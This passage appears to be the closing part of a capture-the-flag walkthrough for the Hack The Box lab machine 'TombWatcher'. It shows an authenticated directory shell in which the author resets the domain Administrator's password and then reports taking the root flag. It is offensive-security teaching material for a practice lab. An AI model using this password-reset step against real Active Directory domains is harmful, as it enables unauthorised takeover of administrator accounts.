[*] Authenticated to '10.129.13.255' as: 'u:TOMBWATCHER\\\\Administrator'
Type help for list of commands
# Let’s change the password
# change_password Administrator P@ssw0rd@123
Got User DN: CN=Administrator,CN=Users,DC=tombwatcher,DC=htb
Attempting to set new password of: P@ssw0rd@123
Password changed successfully!
# and we are in as administrator and got root.txt
Last updated